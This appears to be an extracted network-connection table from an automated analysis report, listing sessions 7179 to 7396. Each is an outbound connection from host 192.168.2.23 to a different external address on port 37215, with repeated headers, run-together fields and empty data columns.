                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7179192.168.2.2354186157.172.65.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7180192.168.2.235987872.20.212.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7181192.168.2.2351738217.62.177.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7182192.168.2.234935241.28.212.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7183192.168.2.2348548157.48.89.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7184192.168.2.233692641.99.233.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7185192.168.2.2349658157.134.232.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7186192.168.2.2336428157.107.169.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7187192.168.2.2341918142.92.33.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7188192.168.2.233327041.93.121.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7189192.168.2.2344204157.150.28.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7190192.168.2.2341528197.84.60.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7191192.168.2.234354679.118.155.15637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7192192.168.2.2351254197.186.234.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7193192.168.2.2336192157.208.1.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7194192.168.2.235922241.199.4.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7195192.168.2.2352040197.29.25.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7196192.168.2.2341728167.128.231.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7197192.168.2.2333328157.158.210.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7198192.168.2.2344518101.187.27.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7199192.168.2.234407841.3.14.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7200192.168.2.2335878157.37.52.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7201192.168.2.2339066197.116.73.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7202192.168.2.2345568157.223.109.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7203192.168.2.235261078.186.108.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7204192.168.2.2358810157.179.94.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7205192.168.2.2351832157.29.13.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7206192.168.2.2334436157.162.138.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7207192.168.2.2343980197.125.119.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7208192.168.2.2342474197.183.171.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7209192.168.2.2336536184.54.164.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7210192.168.2.2336410157.208.235.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7211192.168.2.2359828197.181.27.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7212192.168.2.2334760157.156.225.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7213192.168.2.2335408157.194.26.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7214192.168.2.234839041.32.141.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7215192.168.2.2347320157.93.98.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7216192.168.2.2356734222.221.173.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7217192.168.2.2352118197.46.210.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7218192.168.2.234490041.218.166.11037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7219192.168.2.2344860102.168.17.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7220192.168.2.2341700155.158.73.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7221192.168.2.233736471.30.142.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7222192.168.2.2357976157.177.152.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7223192.168.2.2350508197.163.180.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7224192.168.2.2360480197.106.193.3337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7225192.168.2.235867441.23.181.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7226192.168.2.2333250157.62.233.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7227192.168.2.2350772157.46.9.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7228192.168.2.2343178197.146.44.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7229192.168.2.2348798157.119.114.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7230192.168.2.233950414.45.42.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7231192.168.2.2354558157.143.240.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7232192.168.2.2359288197.43.180.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7233192.168.2.234969441.142.50.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7234192.168.2.234737841.157.106.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7235192.168.2.235535441.181.8.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7236192.168.2.235209641.123.86.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7237192.168.2.2357980157.43.27.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7238192.168.2.2338722157.105.107.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7239192.168.2.2356882197.171.44.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7240192.168.2.2340048157.150.37.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7241192.168.2.2347864123.198.132.2737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7242192.168.2.235359818.63.102.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7243192.168.2.234968841.18.72.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7244192.168.2.2340094197.241.95.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7245192.168.2.234272241.229.37.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7246192.168.2.234470241.160.253.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7247192.168.2.2345464197.238.184.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7248192.168.2.233594841.22.61.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7249192.168.2.2348164157.243.104.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7250192.168.2.233814641.81.231.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7251192.168.2.2351336157.105.122.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7252192.168.2.2340116197.236.142.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7253192.168.2.2354136149.105.228.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7254192.168.2.235222641.31.42.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7255192.168.2.235809040.61.119.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7256192.168.2.2346538197.164.229.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7257192.168.2.2343388197.147.88.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7258192.168.2.2336322197.20.89.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7259192.168.2.234117841.136.60.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7260192.168.2.2340264118.54.26.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7261192.168.2.233495240.198.7.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7262192.168.2.2336132151.72.68.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7263192.168.2.2358740157.29.32.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7264192.168.2.2355380123.166.113.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7265192.168.2.2359268197.218.205.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7266192.168.2.2347156157.49.71.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7267192.168.2.233388224.198.0.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7268192.168.2.236083041.238.90.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7269192.168.2.2333176197.251.9.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7270192.168.2.2345550197.70.5.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7271192.168.2.235398041.71.66.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7272192.168.2.234505641.73.91.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7273192.168.2.2339888157.81.88.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7274192.168.2.2345824157.249.118.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7275192.168.2.2340622197.28.198.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7276192.168.2.2359970197.155.112.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7277192.168.2.235670241.255.117.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7278192.168.2.234133441.133.235.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7279192.168.2.2360782157.24.89.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7280192.168.2.2336532157.226.68.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7281192.168.2.2345326157.216.118.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7282192.168.2.235655641.23.99.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7283192.168.2.2343646197.41.209.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7284192.168.2.2360574197.44.177.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7285192.168.2.235670241.44.246.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7286192.168.2.2348116197.242.71.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7287192.168.2.2354482161.221.217.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7288192.168.2.2349752157.3.100.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7289192.168.2.2339976157.220.187.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7290192.168.2.2360390133.245.72.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7291192.168.2.235919057.8.130.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7292192.168.2.2356686157.30.32.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7293192.168.2.2338212157.188.7.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7294192.168.2.235401841.203.29.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7295192.168.2.2337868157.24.222.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7296192.168.2.2333502157.250.104.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7297192.168.2.2340410157.77.143.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7298192.168.2.2341556197.130.193.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7299192.168.2.236024441.152.55.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7300192.168.2.234887641.20.104.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7301192.168.2.233433293.217.157.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7302192.168.2.235163441.46.252.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7303192.168.2.2334462197.115.5.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7304192.168.2.236033641.236.241.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7305192.168.2.234677689.138.215.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7306192.168.2.2346530197.216.99.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7307192.168.2.2343052197.111.169.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7308192.168.2.2338626197.175.57.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7309192.168.2.2346704157.255.33.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7310192.168.2.2344774123.251.1.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7311192.168.2.233875441.243.34.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7312192.168.2.2354766157.196.48.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7313192.168.2.235574441.7.229.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7314192.168.2.2347188197.233.81.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7315192.168.2.2342708197.94.68.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7316192.168.2.2333738157.46.122.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7317192.168.2.2344038157.82.81.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7318192.168.2.233549090.114.15.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7319192.168.2.2342602104.83.189.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7320192.168.2.2338030197.149.34.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7321192.168.2.2339598197.178.54.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7322192.168.2.2351476205.49.163.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7323192.168.2.2358630181.36.143.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7324192.168.2.2354064120.132.57.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7325192.168.2.234010241.161.188.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7326192.168.2.2352076157.133.56.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7327192.168.2.2357354124.163.2.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7328192.168.2.2359088157.179.21.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7329192.168.2.2347962173.162.7.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7330192.168.2.2349298157.96.168.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7331192.168.2.2355768197.98.241.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7332192.168.2.2360158157.191.36.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7333192.168.2.2338032197.205.81.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7334192.168.2.2337282130.196.140.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7335192.168.2.2345260157.238.249.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7336192.168.2.235626041.255.212.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7337192.168.2.2342154157.166.151.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7338192.168.2.234307841.245.227.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7339192.168.2.2353700197.164.239.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7340192.168.2.233420641.91.229.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7341192.168.2.2357380197.135.113.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7342192.168.2.234604041.132.8.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7343192.168.2.233413441.156.124.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7344192.168.2.2349880157.96.51.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7345192.168.2.233871841.207.128.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7346192.168.2.2337240197.79.201.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7347192.168.2.2344876157.84.169.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7348192.168.2.233403641.48.101.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7349192.168.2.233350041.110.173.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7350192.168.2.2334472157.112.55.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7351192.168.2.2355680157.127.192.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7352192.168.2.233365041.143.135.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7353192.168.2.2341970192.157.52.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7354192.168.2.234435641.214.209.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7355192.168.2.234035041.87.245.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7356192.168.2.2350952201.155.189.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7357192.168.2.2354542204.160.111.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7358192.168.2.233348441.156.89.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7359192.168.2.235451041.187.254.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7360192.168.2.2354046197.126.198.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7361192.168.2.2337164119.183.156.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7362192.168.2.2354184157.102.253.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7363192.168.2.2356710157.124.248.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7364192.168.2.2337562183.77.235.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7365192.168.2.2356454220.85.0.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7366192.168.2.235658041.144.40.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7367192.168.2.2354044157.81.129.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7368192.168.2.2360144157.160.202.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7369192.168.2.2339050115.36.138.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7370192.168.2.235372241.202.185.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7371192.168.2.2343748197.187.167.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7372192.168.2.235413241.18.239.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7373192.168.2.2343894157.167.42.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7374192.168.2.235333041.70.201.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7375192.168.2.235382241.137.171.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7376192.168.2.2352692185.84.163.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7377192.168.2.2355640197.174.133.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7378192.168.2.235140841.132.226.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7379192.168.2.235267441.10.21.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7380192.168.2.2345432170.84.184.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7381192.168.2.2347784157.26.124.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7382192.168.2.234484841.172.140.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7383192.168.2.2335054197.182.85.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7384192.168.2.233660641.184.25.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7385192.168.2.2336834130.3.222.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7386192.168.2.2348804157.225.54.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7387192.168.2.2359272179.188.18.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7388192.168.2.2355412197.175.70.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7389192.168.2.2337968157.161.151.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7390192.168.2.2336364197.81.58.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7391192.168.2.2349056197.129.32.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7392192.168.2.2346962197.180.176.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7393192.168.2.2342176157.82.82.21237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7394192.168.2.2335062217.152.154.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7395192.168.2.2355400157.101.129.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7396192.168.2.2353914157.191.225.7937215
                                          TimestampBytes transferredDirectionData


